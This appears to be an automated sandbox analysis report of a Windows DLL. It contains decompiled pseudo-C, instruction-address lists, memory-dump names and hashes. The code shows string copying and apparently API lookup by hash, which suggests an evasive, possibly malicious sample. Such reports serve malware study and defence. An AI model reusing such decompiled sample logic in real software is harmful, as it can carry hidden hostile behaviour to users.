																_t693 = _v56;
																_t673 = _v64;
															}
															goto L251;
														}
														_t693 = _v56;
														_t673 = _v64;
														 *((char*)(_t696 + _t546)) = 0;
													}
												}
											}
											L251:
											_t612 = _v40;
											 *( *((intOrPtr*)(_t612 + 4)) + _t508 - 4) = _t693;
										} while (_t673 <  *_t612);
										_t505 = _t612;
										_t371 = _v52;
										goto L253;
									}
								} else {
									L198:
									_v52 = 0;
									_v44 = 0;
									_t604 = _v48;
								}
							}
						}
					}
					_push(4);
					_push(_t604);
					E6E7910B0();
					_v48 = 0;
					return _t505;
				}
				L301:
			}

0x6e7a3ec9
0x6e7a3ecc
0x6e7a3ece
0x6e7a3ed1
0x6e7a4b36
0x6e7a3ed7
0x6e7a3ed7
0x6e7a4c80
0x6e7a4c8c
0x6e7a4c90
0x00000000
0x6e7a4c92
0x00000000
0x6e7a4c92
0x6e7a3edd
0x6e7a3edf
0x6e7a3ee3
0x6e7a3ee7
0x6e7a3eeb
0x6e7a3ef3
0x6e7a3ef7
0x6e7a3efd
0x6e7a3f03
0x6e7a3f0b
0x6e7a3f0f
0x6e7a3f13
0x6e7a3f17
0x6e7a4c77
0x6e7a4c79
0x6e7a3f1d
0x6e7a3f1f
0x6e7a3f22
0x6e7a3f3a
0x6e7a3f3e
0x6e7a3f4a
0x6e7a3f4f
0x6e7a3f4f
0x6e7a3f54
0x6e7a3f58
0x6e7a3f5e
0x00000000
0x00000000
0x6e7a3f64
0x6e7a3f69
0x00000000
0x6e7a3f6b
0x6e7a3f70
0x6e7a3f84
0x6e7a3f84
0x00000000
0x6e7a3f72
0x6e7a3f72
0x6e7a3f7c
0x6e7a3f82
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a3f82
0x00000000
0x6e7a3f72
0x6e7a3f70
0x00000000
0x6e7a3f69
0x6e7a4c70
0x6e7a4c73
0x00000000
0x6e7a3f24
0x6e7a3f26
0x6e7a3f28
0x6e7a3f2b
0x6e7a3f35
0x6e7a3f38
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a3f38
0x6e7a4c61
0x6e7a4c63
0x6e7a3f89
0x6e7a3f89
0x6e7a3f8e
0x6e7a3f90
0x6e7a3f99
0x6e7a3f99
0x6e7a3f9e
0x00000000
0x00000000
0x6e7a3fa9
0x00000000
0x00000000
0x00000000
0x6e7a3fa9
0x6e7a4c53
0x6e7a4c56
0x00000000
0x6e7a4c5c
0x00000000
0x6e7a4c5c
0x00000000
0x6e7a4c56
0x6e7a4c69
0x6e7a4c69
0x6e7a4c69
0x6e7a4c63
0x6e7a3f22
0x6e7a3fab
0x6e7a3fad
0x6e7a3fae
0x6e7a3fb2
0x6e7a3fb8
0x6e7a3fc0
0x6e7a3fc1
0x6e7a3fc5
0x6e7a3fca
0x6e7a3fce
0x6e7a3fd2
0x6e7a3fd6
0x6e7a3fe0
0x6e7a3fe3
0x6e7a3fe3
0x6e7a3fe8
0x00000000
0x00000000
0x6e7a3ff3
0x00000000
0x00000000
0x00000000
0x6e7a3ff3
0x6e7a4c36
0x6e7a4c37
0x6e7a4c38
0x6e7a4c3d
0x00000000
0x6e7a4c43
0x00000000
0x6e7a4c43
0x00000000
0x6e7a4c3d
0x6e7a3ff5
0x6e7a3ff5
0x6e7a3ff9
0x6e7a3ff9
0x6e7a3fff
0x6e7a417f
0x6e7a417f
0x6e7a4186
0x6e7a4188
0x6e7a418b
0x6e7a4005
0x6e7a4007
0x6e7a4c2f
0x6e7a400d
0x6e7a400f
0x6e7a4012
0x6e7a4026
0x6e7a402a
0x6e7a4036
0x6e7a403b
0x6e7a403b
0x6e7a4040
0x6e7a4044
0x6e7a404a
0x00000000
0x00000000
0x6e7a4050
0x6e7a4055
0x00000000
0x6e7a4057
0x6e7a405c
0x6e7a406c
0x6e7a406c
0x00000000
0x6e7a405e
0x6e7a4064
0x6e7a406a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a406a
0x6e7a405e
0x6e7a405c
0x00000000
0x6e7a4055
0x6e7a4c25
0x6e7a4c28
0x6e7a4014
0x6e7a4016
0x6e7a4018
0x6e7a401b
0x6e7a4021
0x6e7a4024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a4024
0x6e7a401b
0x6e7a4012
0x6e7a4071
0x6e7a4075
0x6e7a407a
0x6e7a407d
0x6e7a4081
0x6e7a4087
0x6e7a4087
0x6e7a408d
0x00000000
0x6e7a409d
0x6e7a409f
0x6e7a40a1
0x6e7a40a6
0x6e7a40a9
0x6e7a40bd
0x6e7a40c1
0x6e7a40cd
0x6e7a40d3
0x6e7a40d3
0x6e7a40d8
0x6e7a40dc
0x6e7a40e2
0x00000000
0x00000000
0x6e7a40e8
0x6e7a40ed
0x00000000
0x6e7a40ef
0x6e7a40f5
0x6e7a4106
0x6e7a4106
0x00000000
0x6e7a40f7
0x6e7a40fd
0x6e7a4104
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a4104
0x6e7a40f7
0x6e7a40f5
0x00000000
0x6e7a40ed
0x6e7a4b40
0x6e7a4b43
0x6e7a40ab
0x6e7a40ad
0x6e7a40af
0x6e7a40b2
0x6e7a40b8
0x6e7a40bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a40bb
0x6e7a40b2
0x6e7a40a9
0x6e7a410b
0x6e7a4110
0x6e7a4116
0x6e7a411b
0x6e7a412b
0x6e7a412e
0x6e7a4134
0x6e7a413c
0x6e7a413c
0x6e7a4149
0x6e7a414a
0x6e7a4157
0x6e7a4159
0x6e7a415c
0x6e7a415e
0x6e7a4160
0x6e7a4163
0x6e7a4163
0x6e7a4164
0x6e7a4169
0x6e7a416f
0x00000000
0x00000000
0x6e7a417b
0x00000000
0x00000000
0x6e7a417d
0x00000000
0x6e7a417b
0x6e7a4b37
0x6e7a411d
0x6e7a411d
0x6e7a411d
0x6e7a411b
0x6e7a408d
0x6e7a418e
0x6e7a4192
0x6e7a4199
0x6e7a419d
0x6e7a41a1
0x6e7a41a9
0x6e7a4311
0x6e7a4313
0x6e7a4313
0x6e7a431a
0x6e7a431c
0x6e7a4323
0x6e7a4327
0x6e7a432a
0x6e7a432e
0x6e7a437a
0x6e7a4330
0x6e7a4335
0x6e7a4337
0x6e7a433b
0x6e7a433e
0x6e7a4342
0x6e7a4344
0x6e7a4347
0x6e7a4349
0x6e7a434b
0x6e7a434b
0x6e7a434c
0x6e7a4351
0x6e7a4357
0x00000000
0x00000000
0x6e7a4359
0x6e7a435d
0x6e7a4362
0x00000000
0x00000000
0x00000000
0x6e7a4362
0x6e7a4364
0x6e7a4364
0x6e7a4367
0x6e7a4367
0x6e7a4369
0x6e7a436b
0x6e7a436c
0x6e7a4371
0x6e7a4371
0x6e7a4381
0x6e7a4383
0x6e7a4383
0x6e7a41b8
0x6e7a41ba
0x6e7a41bd
0x6e7a41d5
0x6e7a41d9
0x6e7a41e5
0x6e7a41eb
0x6e7a41eb
0x6e7a41f0
0x6e7a41f4
0x6e7a41fa
0x00000000
0x00000000
0x6e7a4200
0x6e7a4205
0x00000000
0x6e7a4207
0x6e7a420d
0x6e7a4222
0x6e7a4222
0x6e7a420f
0x6e7a420f
0x6e7a4219
0x6e7a4220
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a4220
0x00000000
0x6e7a420f
0x6e7a420d
0x00000000
0x6e7a4205
0x6e7a4b6c
0x6e7a4b6f
0x00000000
0x6e7a41bf
0x6e7a41c1
0x6e7a41c3
0x6e7a41c6
0x6e7a41d0
0x6e7a41d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a41d3
0x6e7a4b53
0x6e7a4b56
0x6e7a4b64
0x6e7a4b64
0x6e7a4b56
0x6e7a4227
0x6e7a422c
0x6e7a4232
0x6e7a4238
0x6e7a424e
0x6e7a4252
0x6e7a4258
0x6e7a4260
0x6e7a4260
0x6e7a426e
0x6e7a4271
0x6e7a4275
0x6e7a427b
0x6e7a427d
0x6e7a4280
0x6e7a4284
0x6e7a42d5
0x6e7a4286
0x6e7a4288
0x6e7a428a
0x6e7a428d
0x6e7a4291
0x6e7a4295
0x6e7a4299
0x6e7a429c
0x6e7a429e
0x6e7a429e
0x6e7a429f
0x6e7a42a4
0x6e7a42aa
0x00000000
0x00000000
0x6e7a42ac
0x6e7a42b0
0x6e7a42b5
0x00000000
0x00000000
0x00000000
0x6e7a42b5
0x6e7a42b7
0x6e7a42bb
0x6e7a42bb
0x6e7a42be
0x6e7a42be
0x6e7a42c0
0x6e7a42c2
0x6e7a42c3
0x6e7a42c7
0x6e7a42cc
0x6e7a42d0
0x6e7a42d0
0x6e7a42dc
0x6e7a42df
0x6e7a423a
0x6e7a423a
0x6e7a423a
0x6e7a42e3
0x6e7a42f1
0x6e7a42f3
0x6e7a42f3
0x6e7a42f4
0x6e7a42f9
0x6e7a42ff
0x00000000
0x00000000
0x6e7a430b
0x00000000
0x00000000
0x6e7a430d
0x00000000
0x6e7a430b
0x6e7a4b4a
0x6e7a4b4a
0x6e7a42e3
0x6e7a41a9
0x6e7a438a
0x6e7a438a
0x6e7a438c
0x6e7a438d
0x6e7a4392
0x6e7a4395
0x6e7a4399
0x6e7a439b
0x6e7a43a5
0x6e7a43a7
0x6e7a43a9
0x6e7a43b1
0x6e7a43b7
0x6e7a4c04
0x6e7a4c18
0x6e7a4c18
0x6e7a4c1c
0x6e7a4c06
0x6e7a4c06
0x6e7a4c06
0x6e7a4c0a
0x6e7a4c0e
0x6e7a4c10
0x00000000
0x6e7a4c10
0x6e7a43bd
0x6e7a43bd
0x6e7a43bf
0x6e7a43c7
0x6e7a43c9
0x6e7a43cd
0x6e7a43d1
0x6e7a43d5
0x6e7a43dd
0x6e7a43e1
0x6e7a43e9
0x6e7a43ec
0x6e7a4404
0x6e7a4408
0x6e7a4414
0x6e7a4418
0x6e7a441e
0x6e7a441e
0x6e7a4423
0x6e7a4427
0x6e7a442d
0x00000000
0x00000000
0x6e7a4433
0x6e7a4438
0x00000000
0x6e7a443a
0x6e7a443a
0x6e7a4444
0x00000000
0x6e7a4446
0x6e7a4446
0x6e7a4450
0x6e7a4457
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a4457
0x00000000
0x6e7a4446
0x6e7a4444
0x00000000
0x6e7a4438
0x6e7a4be6
0x6e7a4be8
0x6e7a4beb
0x6e7a4bef
0x00000000
0x6e7a43ee
0x6e7a43f0
0x6e7a43f2
0x6e7a43f5
0x6e7a43ff
0x6e7a4402
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a4402
0x6e7a4bf1
0x6e7a4bf3
0x6e7a4459
0x6e7a4459
0x6e7a4461
0x6e7a4466
0x6e7a4469
0x6e7a446d
0x6e7a4473
0x6e7a4478
0x6e7a4483
0x6e7a4489
0x6e7a4498
0x6e7a449d
0x6e7a449f
0x6e7a44a3
0x6e7a44a8
0x6e7a44ab
0x6e7a44af
0x6e7a44af
0x6e7a44b3
0x6e7a44b7
0x6e7a44cd
0x6e7a44d2
0x6e7a44d2
0x6e7a44d5
0x6e7a44dc
0x6e7a44de
0x6e7a44e3
0x6e7a46f5
0x6e7a44e9
0x6e7a44eb
0x6e7a44ed
0x6e7a44f2
0x6e7a4685
0x6e7a468c
0x6e7a4690
0x6e7a4693
0x6e7a4697
0x6e7a46e3
0x6e7a4699
0x6e7a469e
0x6e7a46a0
0x6e7a46a4
0x6e7a46a7
0x6e7a46ab
0x6e7a46ad
0x6e7a46b1
0x6e7a46b3
0x6e7a46b5
0x6e7a46b5
0x6e7a46b6
0x6e7a46bb
0x6e7a46c1
0x00000000
0x00000000
0x6e7a46c3
0x6e7a46c7
0x6e7a46cc
0x00000000
0x00000000
0x00000000
0x6e7a46cc
0x6e7a46ce
0x6e7a46ce
0x6e7a46ab
0x6e7a46d2
0x6e7a46d4
0x6e7a46d5
0x6e7a46da
0x6e7a46da
0x6e7a46ea
0x6e7a46ec
0x6e7a4501
0x6e7a4503
0x6e7a4506
0x6e7a4528
0x6e7a452c
0x6e7a4538
0x6e7a453e
0x6e7a4542
0x6e7a4544
0x6e7a4544
0x6e7a4549
0x6e7a454d
0x6e7a4553
0x00000000
0x00000000
0x6e7a4559
0x6e7a455e
0x00000000
0x6e7a4560
0x6e7a4560
0x6e7a456c
0x6e7a4582
0x6e7a4582
0x6e7a456e
0x6e7a456e
0x6e7a4570
0x6e7a457a
0x6e7a4580
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a4580
0x6e7a4b84
0x6e7a4b84
0x6e7a456c
0x00000000
0x6e7a455e
0x6e7a4b8d
0x6e7a4b92
0x6e7a4508
0x6e7a4508
0x6e7a4512
0x6e7a4516
0x6e7a4519
0x6e7a4523
0x6e7a4526
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a4526
0x6e7a4b9b
0x6e7a4b9b
0x6e7a458a
0x6e7a4593
0x6e7a4599
0x6e7a459e
0x6e7a45b7
0x6e7a45ba
0x6e7a45be
0x6e7a45c4
0x6e7a45cc
0x6e7a45cc
0x6e7a45d8
0x6e7a45db
0x6e7a45df
0x6e7a45e0
0x6e7a45e5
0x6e7a45e9
0x6e7a45ec
0x6e7a45f0
0x6e7a463c
0x6e7a45f2
0x6e7a45f7
0x6e7a45f9
0x6e7a45fb
0x6e7a45fe
0x6e7a4602
0x6e7a4604
0x6e7a4607
0x6e7a4609
0x6e7a460d
0x6e7a460f
0x6e7a460f
0x6e7a4610
0x6e7a4615
0x6e7a461b
0x00000000
0x00000000
0x6e7a461d
0x6e7a4621
0x6e7a4626
0x00000000
0x00000000
0x00000000
0x6e7a4626
0x6e7a4628
0x6e7a462b
0x6e7a462b
0x6e7a4602
0x6e7a462f
0x6e7a4631
0x6e7a4632
0x6e7a4637
0x6e7a4637
0x6e7a4647
0x6e7a464a
0x6e7a45a0
0x6e7a45a0
0x6e7a45a0
0x6e7a4651
0x6e7a4657
0x6e7a465b
0x6e7a465d
0x6e7a4661
0x6e7a4665
0x6e7a4665
0x6e7a4666
0x6e7a466b
0x6e7a4671
0x00000000
0x00000000
0x6e7a467d
0x00000000
0x6e7a467f
0x6e7a467f
0x6e7a467f
0x00000000
0x6e7a467d
0x6e7a4b77
0x6e7a4b7b
0x6e7a4b7b
0x6e7a4651
0x6e7a44f2
0x6e7a46f7
0x6e7a4703
0x6e7a470c
0x6e7a470d
0x6e7a4711
0x00000000
0x6e7a4bf9
0x6e7a4bf3
0x6e7a43ec
0x6e7a4713
0x6e7a4713
0x6e7a471d
0x6e7a4721
0x6e7a4725
0x6e7a472a
0x6e7a4a96
0x6e7a4a98
0x6e7a4a9c
0x6e7a4aa0
0x6e7a4aa6
0x6e7a4aaa
0x6e7a4aac
0x6e7a4bd2
0x6e7a4ab2
0x6e7a4ab4
0x6e7a4ab8
0x6e7a4aba
0x6e7a4abc
0x6e7a4abc
0x6e7a4ac1
0x6e7a4ac3
0x6e7a4ac5
0x6e7a4aca
0x6e7a4aca
0x6e7a4ace
0x6e7a4ad4
0x6e7a4ad6
0x6e7a4ad8
0x6e7a4add
0x6e7a4add
0x6e7a4ae1
0x6e7a4ae2
0x6e7a4ae6
0x6e7a4ae8
0x6e7a4aea
0x6e7a4aee
0x6e7a4aee
0x6e7a4aee
0x6e7a4af2
0x6e7a4af7
0x6e7a4af9
0x6e7a4aff
0x6e7a4b01
0x6e7a4b03
0x6e7a4b08
0x6e7a4b08
0x6e7a4aff
0x6e7a4af7
0x6e7a4730
0x6e7a4730
0x6e7a4736
0x6e7a4738
0x6e7a473d
0x6e7a479a
0x6e7a479a
0x6e7a473f
0x6e7a4741
0x6e7a4744
0x6e7a4746
0x6e7a4bdc
0x6e7a474c
0x6e7a474c
0x6e7a4750
0x6e7a4752
0x6e7a4754
0x6e7a4754
0x6e7a4759
0x6e7a475b
0x6e7a475d
0x6e7a4762
0x6e7a4762
0x6e7a4765
0x6e7a476b
0x6e7a476d
0x6e7a476f
0x6e7a4774
0x6e7a4774
0x6e7a4777
0x6e7a4778
0x6e7a477c
0x6e7a4780
0x6e7a4780
0x6e7a4780
0x6e7a4784
0x6e7a4789
0x6e7a478b
0x6e7a4791
0x6e7a4793
0x6e7a4795
0x00000000
0x6e7a4795
0x6e7a4791
0x6e7a4789
0x6e7a479d
0x6e7a479f
0x6e7a47a0
0x6e7a47a5
0x6e7a47a8
0x6e7a47ac
0x6e7a47b5
0x6e7a47d6
0x6e7a47e0
0x6e7a47e4
0x6e7a47e7
0x6e7a47ec
0x6e7a47ef
0x6e7a47f3
0x6e7a47f6
0x6e7a47fa
0x00000000
0x6e7a47fc
0x6e7a47fc
0x6e7a4800
0x6e7a4802
0x6e7a4806
0x6e7a4806
0x6e7a4808
0x6e7a480e
0x6e7a4810
0x6e7a4815
0x6e7a4a74
0x6e7a4a76
0x6e7a481b
0x6e7a481d
0x6e7a481e
0x6e7a4826
0x6e7a4828
0x6e7a4831
0x6e7a4835
0x6e7a483c
0x6e7a483c
0x6e7a4842
0x6e7a4844
0x6e7a4847
0x6e7a484b
0x6e7a4a04
0x6e7a4a06
0x6e7a4a0b
0x6e7a4a0f
0x6e7a4a12
0x6e7a4a16
0x6e7a4a63
0x6e7a4a18
0x6e7a4a1c
0x6e7a4a1e
0x6e7a4a20
0x6e7a4a23
0x6e7a4a27
0x6e7a4a29
0x6e7a4a2d
0x6e7a4a2f
0x6e7a4a33
0x6e7a4a35
0x6e7a4a35
0x6e7a4a36
0x6e7a4a3b
0x6e7a4a41
0x00000000
0x00000000
0x6e7a4a43
0x6e7a4a47
0x6e7a4a4c
0x00000000
0x00000000
0x00000000
0x6e7a4a4c
0x6e7a4a4e
0x6e7a4a52
0x6e7a4a52
0x6e7a4a27
0x6e7a4a56
0x6e7a4a58
0x6e7a4a59
0x6e7a4a5e
0x6e7a4a5e
0x6e7a4a69
0x6e7a4a6b
0x6e7a485a
0x6e7a485c
0x6e7a485f
0x6e7a4881
0x6e7a4885
0x6e7a4891
0x6e7a4896
0x6e7a489a
0x6e7a489e
0x6e7a48a0
0x6e7a48a0
0x6e7a48a5
0x6e7a48a9
0x6e7a48af
0x00000000
0x00000000
0x6e7a48b5
0x6e7a48ba
0x00000000
0x6e7a48bc
0x6e7a48bc
0x6e7a48c0
0x6e7a48cc
0x6e7a48e4
0x6e7a48e4
0x6e7a48ce
0x6e7a48ce
0x6e7a48d2
0x6e7a48dc
0x6e7a48e2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a48e2
0x00000000
0x6e7a48d2
0x6e7a48cc
0x00000000
0x6e7a48ba
0x6e7a4bc0
0x6e7a4bc5
0x6e7a4bc9
0x6e7a4861
0x6e7a4861
0x6e7a486b
0x6e7a486f
0x6e7a4872
0x6e7a487c
0x6e7a487f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a487f
0x6e7a4bb7
0x6e7a4bb7
0x6e7a4bb7
0x6e7a48ec
0x6e7a48fb
0x6e7a4900
0x6e7a4913
0x6e7a4916
0x6e7a491a
0x6e7a491f
0x6e7a4927
0x6e7a4927
0x6e7a4934
0x6e7a4937
0x6e7a493b
0x6e7a493c
0x6e7a4940
0x6e7a4945
0x6e7a4949
0x6e7a494b
0x6e7a494e
0x6e7a4950
0x6e7a4956
0x6e7a49bc
0x6e7a4958
0x6e7a495a
0x6e7a495c
0x6e7a495f
0x6e7a4963
0x6e7a4965
0x6e7a4969
0x6e7a496b
0x6e7a496f
0x6e7a4973
0x6e7a4977
0x6e7a4977
0x6e7a4978
0x6e7a497d
0x6e7a4983
0x00000000
0x00000000
0x6e7a4985
0x6e7a4989
0x6e7a498e
0x00000000
0x00000000
0x00000000
0x6e7a498e
0x6e7a4990
0x6e7a4994
0x6e7a4998
0x6e7a4998
0x6e7a4963
0x6e7a499c
0x6e7a499e
0x6e7a49a2
0x6e7a49a6
0x6e7a49aa
0x6e7a49af
0x6e7a49b3
0x6e7a49b7
0x6e7a49b7
0x6e7a49c3
0x6e7a49c6
0x6e7a4902
0x6e7a4902
0x6e7a4902
0x6e7a49ca
0x6e7a49d2
0x6e7a49d6
0x6e7a49da
0x6e7a49dc
0x6e7a49e0
0x6e7a49e0
0x6e7a49e1
0x6e7a49e6
0x6e7a49ec
0x00000000
0x00000000
0x6e7a49f8
0x00000000
0x6e7a49fa
0x6e7a49fa
0x6e7a49fe
0x6e7a49fe
0x00000000
0x6e7a49f8
0x6e7a4ba6
0x6e7a4baa
0x6e7a4bae
0x6e7a4bae
0x6e7a49ca
0x6e7a484b
0x6e7a4a7d
0x6e7a4a7d
0x6e7a4a84
0x6e7a4a88
0x6e7a4a90
0x6e7a4a92
0x00000000
0x6e7a4a92
0x6e7a47b7
0x6e7a47b7
0x6e7a47b9
0x6e7a47bd
0x6e7a47c1
0x6e7a47c1
0x6e7a47b5
0x6e7a472a
0x6e7a43b7
0x6e7a4b0c
0x6e7a4b0e
0x6e7a4b0f
0x6e7a4b17
0x6e7a4b2a
0x6e7a4b2a
0x00000000

Strings

, xrefs: 6E7A3EF7

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3688684798
Opcode ID: 874b4794743124c2a5223745c04ba87ea36f5dafb4a71d92dde62585ceb233b3
Instruction ID: 238aab2ac429525c3808120a649d689d120c17986e3975ac5e2570f47cce2bf7
Opcode Fuzzy Hash: 874b4794743124c2a5223745c04ba87ea36f5dafb4a71d92dde62585ceb233b3
Instruction Fuzzy Hash: 759209706083428FD715CEADC69031AB7E1BFC5304F148B6DE9A5973A5FB36D8429B82

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A62F0, Relevance: 2.2, Strings: 1, Instructions: 961
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E6E7A62F0(intOrPtr* __ecx, signed int __edx, void* __eflags, char _a4) {
				intOrPtr* _v24;
				char _v32;
				intOrPtr _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v52;
				char _v56;
				unsigned int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _t264;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				void* _t272;
				char _t278;
				char _t279;
				char* _t281;
				signed int _t282;
				char _t283;
				void* _t287;
				char _t290;
				char _t291;
				char* _t293;
				signed int _t294;
				char _t295;
				signed int _t304;
				intOrPtr* _t306;
				intOrPtr* _t308;
				signed int _t310;
				signed int _t311;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				char* _t320;
				char* _t321;
				unsigned int _t322;
				unsigned int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t332;
				signed int _t333;
				signed int _t336;
				signed int _t338;
				signed int _t339;
				signed int _t342;
				char* _t343;
				char* _t344;
				signed int _t346;
				signed int _t348;
				signed int _t349;
				signed int _t352;
				char* _t353;
				char* _t357;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t365;
				unsigned int _t375;
				signed int _t377;
				signed int _t381;
				signed int _t387;
				signed int _t389;
				signed int _t390;
				signed int _t395;
				signed int _t407;
				signed int _t417;
				char* _t418;
				char _t420;
				signed int _t421;
				void* _t431;
				char _t432;
				char _t434;
				char _t435;
				char* _t436;
				char _t438;
				char* _t439;
				char _t440;
				signed int _t441;
				void* _t451;
				char _t452;
				char _t454;
				char _t455;
				char* _t456;
				char _t458;
				char _t460;
				char _t461;
				signed int _t463;
				signed int _t465;
				void* _t469;
				char _t471;
				char _t472;
				signed int _t476;
				void* _t478;
				char _t480;
				char _t481;
				void* _t482;
				char _t484;
				char _t485;
				char _t489;
				char _t490;
				char _t491;
				char _t492;
				char _t493;
				char _t494;
				signed int _t497;
				char* _t499;
				void* _t505;
				unsigned int _t506;
				void* _t512;
				char* _t514;
				void* _t520;
				void* _t521;
				void* _t522;
				void* _t523;
				signed int _t524;
				void* _t531;
				void* _t537;
				void* _t543;
				signed int _t544;
				signed int _t548;
				void* _t551;
				void* _t552;
				void* _t553;

				_t306 = __ecx;
				_push(0x40);
				_t496 = __edx;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t514 = E6E791030();
				_t551 = (_t548 & 0xfffffff0) - 0x34 + 4;
				_t320 =  *__ecx;
				if(_t320 == 0) {
					 *_t514 = 0;
				} else {
					if(_t514 != 0) {
						_t492 =  *_t320;
						 *_t514 = _t492;
						if(_t492 != 0) {
							_v68 = __edx;
							_t304 = 0;
							while(1) {
								_t304 = _t304 + 1;
								_t493 =  *((char*)(_t320 + _t304 * 2 - 1));
								 *((char*)(_t514 + _t304 * 2 - 1)) = _t493;
								if(_t493 == 0) {
									break;
								}
								_t494 =  *((char*)(_t320 + _t304 * 2));
								 *((char*)(_t514 + _t304 * 2)) = _t494;
								if(_t494 != 0) {
									continue;
								}
								break;
							}
							_t496 = _v68;
						}
					}
					_push(1);
					_push(_t320);
					E6E7910B0();
					_t551 = _t551 + 8;
				}
				_v44 = 0;
				_push(0x40);
				 *_t306 = _t514;
				 *((intOrPtr*)(_t306 + 4)) = 0x40;
				_t264 = E6E791030();
				_t552 = _t551 + 4;
				_t321 = _v44;
				if(_t321 == 0) {
					 *_t264 = 0;
					_v40 = 0x40;
					_v44 = _t264;
					goto L18;
				} else {
					if(_t264 == 0) {
						_push(1);
						_push(_t321);
						E6E7910B0();
						_t552 = _t552 + 8;
						_v40 = 0x40;
						_t520 = 0;
						_v44 = 0;
						goto L29;
					} else {
						_t489 =  *_t321;
						 *_t264 = _t489;
						if(_t489 != 0) {
							_v40 = 0;
							_t544 = 0;
							_v68 = _t496;
							while(1) {
								_t544 = _t544 + 1;
								_t490 =  *((char*)(_t321 + _t544 * 2 - 1));
								 *((char*)(_t264 + _t544 * 2 - 1)) = _t490;
								if(_t490 == 0) {
									break;
								}
								_t491 =  *((char*)(_t321 + _t544 * 2));
								 *((char*)(_t264 + _t544 * 2)) = _t491;
								if(_t491 != 0) {
									continue;
								}
								break;
							}
							_t496 = _v68;
						}
						_push(1);
						_push(_t321);
						_v64 = _t264;
						E6E7910B0();
						_t264 = _v64;
						_t552 = _t552 + 8;
						_v40 = 0x40;
						_v44 = _t264;
						L18:
						_t387 = _t264 & 0x0000000f;
						if(_t387 == 0) {
							L22:
							asm("pxor xmm0, xmm0");
							_t520 =  ~( ~_t387 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [eax+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								if(_t321 != 0) {
									break;
								}
								_t387 = _t387 + 0x10;
								if(_t387 < _t520) {
									continue;
								} else {
									if(_t520 >= 0x7fffffff) {
										L28:
										_t520 = 0x7fffffff;
										goto L29;
									} else {
										while( *((char*)(_t520 + _t264)) != 0) {
											_t520 = _t520 + 1;
											if(_t520 < 0x7fffffff) {
												continue;
											} else {
												goto L28;
											}
											goto L30;
										}
										goto L250;
									}
								}
								goto L30;
							}
							asm("bsf esi, ecx");
							_t520 = _t520 + _t387;
							goto L250;
						} else {
							_t520 = 0;
							_t387 =  ~_t387 + 0x10;
							while( *((char*)(_t520 + _t264)) != 0) {
								_t520 = _t520 + 1;
								if(_t520 < _t387) {
									continue;
								} else {
									goto L22;
								}
								goto L30;
							}
							L250:
							if(_t520 != 0xfffffffe || _t264 == 0) {
								L29:
								_t322 = 0x40;
							} else {
								 *_t264 = 0;
								_t322 = _v40;
							}
							goto L30;
							L124:
							 *((char*)(_t269 + _t523)) = 0x64;
							_t417 = _v44;
							 *((char*)(_t523 + _t417 + 1)) = 0;
							if(_a4 == 0) {
								_v32 = _t496;
								_t497 = _v44;
								_v36 = _t497;
								_push(0x200);
								_t524 = E6E791030();
								_t553 = _t552 + 4;
								_v24 = _t306;
								_t272 = E6E7915C0(0x588ab3ea, 0x8a156a0e);
								if(_t272 == 0) {
									_t308 = _v24;
									if(_t524 == 0 ||  *_t524 == 0) {
										_t418 =  *_t308;
										if(_t418 != 0) {
											 *_t418 = 0;
										}
										if( *((intOrPtr*)(_t308 + 4)) < 0x40) {
											_push(0x40);
											_t499 = E6E791030();
											_t553 = _t553 + 4;
											_t344 =  *_t308;
											if(_t344 == 0) {
												 *_t499 = 0;
											} else {
												if(_t499 != 0) {
													_t420 =  *_t344;
													 *_t499 = _t420;
													if(_t420 != 0) {
														_v24 = _t308;
														_t421 = 0;
														while(1) {
															_t421 = _t421 + 1;
															_t278 =  *((char*)(_t344 + _t421 * 2 - 1));
															 *((char*)(_t499 + _t421 * 2 - 1)) = _t278;
															if(_t278 == 0) {
																break;
															}
															_t279 =  *((char*)(_t344 + _t421 * 2));
															 *((char*)(_t499 + _t421 * 2)) = _t279;
															if(_t279 != 0) {
																continue;
															}
															break;
														}
														_t308 = _v24;
													}
												}
												_push(1);
												_push(_t344);
												E6E7910B0();
												_t553 = _t553 + 8;
											}
											goto L225;
										}
									} else {
										_t346 = _t524 & 0x0000000f;
										if(_t346 == 0) {
											L184:
											asm("pxor xmm0, xmm0");
											_t505 =  ~( ~_t346 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											while(1) {
												asm("movdqu xmm1, [esi+ecx]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb edx, xmm1");
												if(_t417 != 0) {
													break;
												}
